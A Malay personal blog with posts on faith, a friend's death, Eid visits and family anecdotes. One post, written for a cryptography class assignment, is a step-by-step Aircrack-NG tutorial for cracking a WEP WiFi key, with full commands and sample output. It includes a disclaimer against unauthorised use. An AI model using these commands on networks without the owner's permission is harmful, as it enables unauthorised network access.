Wednesday, September 29, 2010

Bila Iman Diuji

بسم الله الرحمن الرحيم


Penat dan lesu juga sebenarnya kerana baru sahaja tiba di rumah, Kuala Kubu Bharu. Terlebih dahulu membantu kakak aku mengangkut segala barang-barang dari rumah sewa di Bandar Baru Sentul. Lapar rasanya perut sekarang ni tapi alhamdulillah sebab ada burger ayam keju istimewa (chicken special cheese) yang dibeli oleh seorang teman sebelum aku berangkat pulang petang tadi. Boleh aku makan sambil teruskan bercerita? Bismillah...

Alhamdulillah, memang sedap dan rezeki aku tapi nasihat untuk kamu semua, jangan selalu makan burger, tak baik untuk kesihatan. Kembali pada tajuk asal cerita, Bila Iman Diuji. Saat yang manakah baru dipanggil ujian kepada iman yang kita miliki? Ini yang nak aku ceritakan. Cerita pengalaman yang baru sahaja terkena pada aku lantas aku menulis di sini.


Yang terkena pada aku sebentar tadi mengingatkan aku kepada ceramah yang diberi oleh pendakwah terkemuka, imam besar United States iaitu Sheikh Yusuf Estes. Ceramah beliau ketika itu berkenaan dengan bagaimanakah respon seseorang itu apabila diuji kesabaran dan ditahap manakah imannya.



Sheikh Yusuf Estes ketika memberikan ceramah di Universiti Malaya pada November 2008


Teringat kata-kata beliau yang agak mencuit hati, "Katakan apabila seseorang itu sedang memaku di dinding dan tertukul di tangan sendiri. Respon yang bagaimanakah menunjukkan seseorang itu sangat beriman? Dush! Ya Allah!! Yang ini belum cukup lagi. Dush! Astaghfirullah! Yang ini pun belum cukup lagi. Yang ini baru hebat, dush! Alhamdulillah.." seloroh beliau sambil melakonkan gaya orang sedang memaku. Sangat mengasyikkan dan menarik ceramah yang diberi oleh beliau.

Kaitan ceramah beliau dengan cerita aku ialah, sejurus aku tiba di rumah aku terus mengangkut barang-barang kepunyaan kakak aku dari kereta ke letak di hadapan pintu rumah. Aku longgokkan semua barang-barang di situ sebelum mengangkut masuk ke dalam rumah. Setelah itu, aku pun mula mengangkat barang-barang yang berlonggok tersebut masuk ke rumah. Nak dijadikan cerita, memang sengaja Allah nak menguji iman seorang hambaNya tatkala letih lagikan lesu dan lapar, terasalah basah ketika mengangkat kotak printer. Sememangnya di luar baru sahaja mulai hujan rintik-rintik namun, basah di sisi kiri kotak tersebut agak kencang juga. Aku cium bau tangan yang basah itu dan semerbaklah bau hancing najis kencing kucing jantan yang terhegeh-hegeh nak jual minyak pada kucing betina yang seekor di rumah ini. Tak sampai lima minit pun aku tinggal barang-barang tu kat luar, sempat lagi si jantan tu pancut. Haishh!!

Serta-merta, terkeluarlah laju ucapan dari mulut aku yang bukan istighfar, tahmid mahupun takbir. Nak tahu apa perkataan yang aku sebut?

Sila klik di sini untuk mengetahui dengan lebih lanjut cerita dan perkataan yang telah aku sebut.




Monday, September 27, 2010

Apa Khabar Iman?

بسم الله الرحمن الرحيم





Lesu sangat rasanya seluruh tubuh. Penat akan tugasan projek seharian di hangar Batu Berendam. Ini baru hari pertama, akan datang belum tahu lagi penatnya bagaimana. Namun begitu, sudah aku niatkan untuk berkongsi bersama semua pembaca Hijrah Huzaifah akan pesanan dari seorang sahabat tidak lama dahulu sewaktu Ramadhan yang indah bertandang. Hanya dengan satu mesej pesanan ringkas sahaja mampu membuatkan aku terkedu dan serta merta bermuhasabah diri akan kelemahan yang seringkali membuatkan kita lalai lantas tidak perasankan amalan yang semakin hari semakin ringan.

Ring.. ring.. deringan muzik message tone yang aku tetapkan berbunyi. 1 unread message. Open.
Terus terkedu akan pesanan yang berbunyi "Salam. Apa khabar iman ya akh?". Cukup mendalam sekali. Alhamdulillah, ada seorang sahabat yang begitu mengambil berat iman sahabatnya sedang aku sendiri leka di kala Ramadhan. Mungkin, ada kalanya kita rasa kita cukup dan sudah cukup banyak akan amalan seharian yang kita lakukan namun, lebih lagi kalanya kita leka dengan nikmat dunia, sibuk dengan kesibukan dunia, dan terabailah akan ukhrawi maka tidak seimbanglah akan kedua amalan tersebut.

Bersyukur dengan peringatan yang diunjurkan oleh sang sahabat, aku sebarkan jua peringatan buat sahabat-sahabat yang lain secara langsung mahupun tidak. Setidak-tidaknya, kita saling memperingati antara satu sama yang lain kerana sudah menjadi lumrah manusia ini memang pelupa. Jadilah kita sebagaimana firman Allah S.W.T di dalam surah al-'Asr


Demi masa! Sesungguhnya manusia berada dalam kerugian, kecuali orang-orang yang beriman dan beramal soleh, dan mereka yang berpesan-pesan dengan kebenaran serta berpesan-pesan dengan kesabaran

Jadi, buat kamu pembaca..
Apa khabar iman?

Perginya Seorang Sahabat. Al-Fatihah.

بسم الله الرحمن الرحيم






Mesej pesanan ringkas daripada Boter malam tadi agak mengejutkan aku. Berita pemergian seorang sahabat seangkatan semasa menuntut di German-Malaysian Institute sedikit sebanyak menghadirkan perasaan sedih dan secara tidak langsung mengingatkan aku pada ajal yang tandangnya tiada dikira usia.

Arwah Jafni atau lebih dikenali sebagai Specky dikalangan kami memang sudah diketahui menghidap pendarahan dalam otak sejak kami sama-sama menuntut diploma dahulu. Namun ketabahan beliau yang tetap ingin menghabiskan pengajian biarpun terpaksa menangguhkan beberapa semester membuatkan aku berasa sangat kagum.

Setibanya aku di Equine Park lewat malam tadi, cepat-cepat aku melayar Google mencari klu-klu berkenaan arwah. Rupa-rupanya beliau telah koma lebih kurang dua bulan sebelum menghembuskan nafas yang terakhir. Semoga roh beliau dicucuri rahmat dan ditempatkan di dalam golongan insan-insan yang beriman insyaAllah.

Al-Fatihah...

Saturday, September 25, 2010

Dalam Pembikinan

بسم الله الرحمن الرحيم




HARAP MAAF, HIJRAH HUZAIFAH DALAM PEMBIKINAN SEMULA REKABENTUK DAN SUSUNATUR. SEGALA KESULITAN AMATLAH DIKESALI.
TERIMA KASIH

Friday, September 24, 2010

Layout Yang Rosak

بسم الله الرحمن الرحيم



Assala~mualaikum ~~ (bagi salam ala-ala Prof Izzi Hj Ali). Hari ini sekadar nak memberitahu yang memang aku dah tahu layout Hijrah Huzaifah ni ada sedikit kekacauan. Sememangnya dari awalan lagi nak diperbaharui dan diperbaiki layout yang rosak ni namun, tiada berkesempatan. Sedia al-maklumlah nak baiki layout supaya lebih sempurna memakan masa yang agak lama tambah-tambah lagi nak meng'edit' kod-kod html. Ingat nak siapkan sekarang tapi ada banyak perkara lain yang perlu disudahkan dan lebih afdhal dari memperbaiki layout Hijrah Huzaifah ni. Nanti aku akan baiki juga insyaAllah.

Wallahu'alam.

Saturday, September 18, 2010

Assignment Raya - Cara-cara Menggodam WiFi

بسم الله الرحمن الرحيم




Assalamualaikum W.B.T. . Hah, kali ni tajuk memang agak menarik memandangkan aku perlu menyiapkan tugasan cuti raya yang telah diberi oleh pensyarah subjek Cryptography. Apakah tugasan itu? Terpampang sudah di tajuk entry aku cara untuk hack WiFi.

Tapi secara tepatnya, tugasan yang diberikan ialah setiap kumpulan dua hingga tiga orang perlu memilih sebarang tool untuk memecahkan sesuatu encryption dan kemudian membuat pembentangan termasuk demonstrasi secara live penggunaan tool tersebut sehingga berjaya memecahkan encryption target. Pendek cerita, hack dengan jayanya.

Dengan itu, kumpulan aku telah memilih Aircrack-NG sebagai alat godam untuk dibentangkan selepas cuti raya yang dah semakin hampir. Okeh, kita terus kepada cara nak gunakan Aircrack-NG dan cukup-cukuplah aku merepek panjang. Aku akan buat tutorial yang lebih kurang, mengikut cara yang paling ringkas dan tinggi tahap kejayaannya. Ha, tapi harap maklum akan peringatan ini!

JANGAN MENGGODAM TANPA KEBENARAN EMPUNYA RANGKAIAN. KERANA IANYA MENYALAHI UNDANG-UNDANG SIBER! HIJRAH HUZAIFAH TIDAK AKAN BERTANGGUNGJAWAB ATAS APA-APA AKIBAT DARI PENGGUNAAN TUTORIAL INI. TUTORIAL INI ADALAH SEKADAR UNTUK PERKONGSIAN ILMU SEMATA-MATA DAN ALAT YANG DIGUNAKAN BERTUJUAN TIDAK LAIN HANYALAH DEMI MENGUJI KEBERKESANAN SISTEM PERTAHANAN WIFI SESUATU RANGKAIAN.

Penggunaan Aircrack-NG adalah sangat mudah lebih lagi sekiranya kamu tahu menggunakan Linux dan sebarang sistem operasi berasaskan UNIX. Aku akan kongsikan cara-cara untuk menggodam ke WiFi yang menggunakan WEP kerana ianya lebih mudah dan pantas walaupun kini orang sudah jarang menggunakannya memandangkan WPA/WPA2 encryption adalah lebih kuat pertahanannya dan sangat susah untuk digodam. Mudahnya, jika kamu mempunyai sebarang rangkaian WiFi, sila guna WPA sebagai security encryption kerana kamu akan sedar betapa rapuhnya WEP itu selepas membaca tutorial ini. Dengan tujuh langkah mudah, WEP berjaya digodam.

Langkah 1 - Dapatkan Aircrack-NG
Dapatkan BackTrack 4 dan gunakan UNetbootin untuk membuat LiveUSB. Gunakan pendrive USB bersaiz 4GB dan boot melalui pendrive USB tersebut. Boleh juga BackTrack 4 tersebut diburn ke dalam DVD dan sama juga, sila boot menggunakan DVD tersebut.

Langkah 2 - Hidupkan WiFi dalam Monitor Mode
Run Konsole, dan pastikan kad WiFi anda berfungsi dengan menggunakan arahan ini.

 iwconfig

Pastikan terdapat WiFi adapter anda di situ. Selalunya akan bernama wlan0.

Kemudian, gunakan arahan ifconfig wlan0 up untuk membangunkan WiFi anda dan pastikan ianya telah bangun dari tidur dengan menggunakan arahan ifconfig.

Guna arahan ini untuk meletakkan wlan0 kepada monitor mode.

 airmon-ng start wlan0

Sistem akan membalas seperti berikut :

 Interface       Chipset         Driver    wlan0           Atheros         madwifi-ng  mon0            Atheros         madwifi-ng VAP (parent: wlan0) (monitor mode enabled)

Langkah 3 - Uji Packet Injection
Ini adalah untuk memastikan anda berada dalam jarak yang cukup hampir dengan Access Point (AP) yang hendak digodam dan kebolehan kad WiFi anda untuk membuat Packet Injection.

aireplay-ng -9 -e huzaifahNet mon0

Di mana
  • -9 bermaksud injection test
  • -e huzaifahNet ialah nama jaringan wireless (SSID) tersebut.
  • mon0 ialah interface WiFi kad kita yang telah ditukar kepada monitor mode.
Anda akan mendapat respon berikut :

 09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9  09:23:35  Trying broadcast probe requests...  09:23:35  Injection is working!  09:23:37  Found 1 AP     09:23:37  Trying directed probe requests...  09:23:37  00:14:6C:7E:40:80 - channel: 9 - 'huzaifahNet'  09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73  09:23:39  30/30: 100%

Pastikan output terakhir cukup tinggi dan sekiranya 0%, anda mungkin terlalu jauh dari AP tersebut ataupun kad WiFI anda tidak boleh digunakan untuk packet injection. Rujuk laman web Aircrack-NG untuk maklumat lanjut

Langkah 4 - Guna Airodump-NG untuk dapatkan IVs
Buka Konsole yang lain dan taip arahan di bawah.

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output mon0
Di mana :
  • -c 9 ialah channel AP tersebut.
  • --bssid 00:14:6C:7E:40:80 ialah alamat MAC untuk AP tersebut.
  • -w capture ialah nama file untuk IVs yang dipancing.
  • mon0 ialah nama interface seperti sedia maklum.
Ouput packet injection adalah seperti berikut:

 CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25                                                                                                                  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID                                                                                                               00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         huzaifahNet                                                                                                                                          BSSID              STATION            PWR  Lost  Packets  Probes                                                                                                                                                            00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  


Langkah 5 - Buat Authentication Palsu Menggunakan aireplay-ng

aireplay-ng -1 0 -e huzaifahNet -h 00:0F:B5:88:AC:82 mon0
Di mana:
  • -1 bermaksud authentication palsu
  • 0 masa reassociation dalam saat
  • -e huzaifahNet nama wireless.
  • -h 00:0F:B5:88:AC:82 ialah MAC address kita
  • mon0 interface kad
Sekiranya berjaya,

18:18:20  Sending Authentication Request 18:18:20  Authentication successful 18:18:20  Sending Association Request 18:18:20  Association successful :-)

Langkah 6 - Guna aireplay-ng dalam ARP request mode

 aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
Sekiranya berjaya (pastikan terdapat user lain berhubung dengan AP tersbut),

 Saving ARP requests in replay_arp-0321-191525.cap  You should also start airodump-ng to capture replies.  Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

Langkah 7 - Guna aircrack-ng untuk dapatkan WEP key

 aircrack-ng -e huzaifahNet output*.cap
Sekiranya berjaya,

                                              Aircrack-ng 0.9                                   [00:03:06] Tested 674449 keys (got 96610 IVs)    KB    depth   byte(vote)   0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)    1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)    2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)    3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)                           KEY FOUND! [ 12:34:56:78:90 ]        Probability: 100%

Perhatian :
Tutorial ini mengambil pendekatan paling mudah dan sekiranya terdapat sebarang kemusykilan, sila rujuk laman web aircrack-ng.

Wallahu'alam.

Thursday, September 16, 2010

Ular Tedung Memang Ada. Orang Tedung?

بسم الله الرحمن الرحيم





Assalamualaikum W.B.T. . Ular tedung adalah sejenis ular yang sangat berbisa dan amat dikenali oleh kita semua. Itu kalau ular, tapi bagaimana dengan orang? Pernah dengar ada Orang Tedung? Ni yang aku nak kongsikan dengan kamu semua si pembaca. Dua malam lalu, aku dan keluarga beraya di rumah Mak Bah, Sempang Pantai Merlimau Melaka. Sedang kami makan kuih raya buatan sendiri oleh anak-anak dara Mak Bah, tak sengaja aku terdengar perbualan ayah aku bersama pakcik. " Dia pergi dengan Orang Tedung" ayat pakcik aku yang membuatkan kunyahan kuih raya aku mati lantas aku memasang telinga untuk terus mendengar. Ayah aku berborak tanpa ada tanda-tanda terkejut mahupun pelik. Ini yang aku bertambah pelik. Tak terkejut ke dengar ada Orang Tedung? Haha.. Baru aku tau selepas aku memerah otak teringatlah sudah akan Kampung Tedong yang terletaknya di Merlimau juga. Jadi, sekian cerita kali ini berkenaan dengan Orang Tedong itu yang bermaksud, orang yang tinggal di Tedong. Haa... Kat bawah ni aku sertakan bersama Google Map Kampung Tedong. Oh, gambar Orang Tedung di atas adalah ikhsan dari http://jewlzchu.com/snake.html .

Wallahu'alam.





View Larger Map

Monday, September 13, 2010

Lembaga

بسم الله الرحمن الرحيم






Assalamualaikum W.B.T. . Diam tak diam telah masuk Syawal yang ke-empat. Alhamdulillah, semalam telah berkunjung ziarah ke rumah saudara-mara yang wajib diziarahi sekitar Bandaraya Bersejarah ini. Hari ini,gotong royong membersihkan rumah. Nak dijadikan cerita, hari raya pertama aku sekeluarga beraya di kampung sebelah ayah. Felda Endau yang lebih dikenali dengan nama Felda Lembaga dikalangan penduduk tempatan. Jangan tanya kenapa namanya Lembaga sebab aku pun tak tahu. Mungkin juga ada kes-kes orang nampak lembaga lalu-lalang kat kawasan felda tu agaknya. Apa-apa je lah, aku cuma nak kongsikan gambar raya yang julung kalinya diambil dengan kadar kehadiran ahli keluarga seramai 80 peratus dalam gambar. Memang jarang sekali keluarga sebelah ni yang nak posing amik gambar beramai-ramai. InsyaAllah, lain kali akan ada 100 peratus kehadiran dalam gambar. Next time.

Daripada Abu Abdul Rahman Abdullah bin Mas’ud beliau berkata: “Aku bertanya kepada Nabi s.a.w, amalan manakah paling disukai Allah SWT? Baginda menjawab, solat pada waktunya. Aku bertanya lagi, kemudian apa? Baginda menjawab, kemudian berbakti kepada kedua orang tua. Aku bertanya lagi, kemudian apa? Baginda menjawab, jihad pada jalan Allah.” (Hadith Riwayat Bukhari dan Muslim)


Friday, September 10, 2010

Salam Aidilfitri

بسم الله الرحمن الرحيم






Dapatkan Mesej Bergambar di Sini



Assalamualaikum W.B.T. Ramadhan telah pun berlalu pergi. Hari ini sudah kunjung tiba si Aidilfitri. Sekadar sepatah dua tulisan yang mampu aku lampirkan dikesempatan. Semoga Allah terima segala amal Ramadhan kita. Bersederhanalah menyambut Aidilfitri, ampun maaf ku pohon di sini.
Selamat Hari Raya, Maaf Zahir & Batin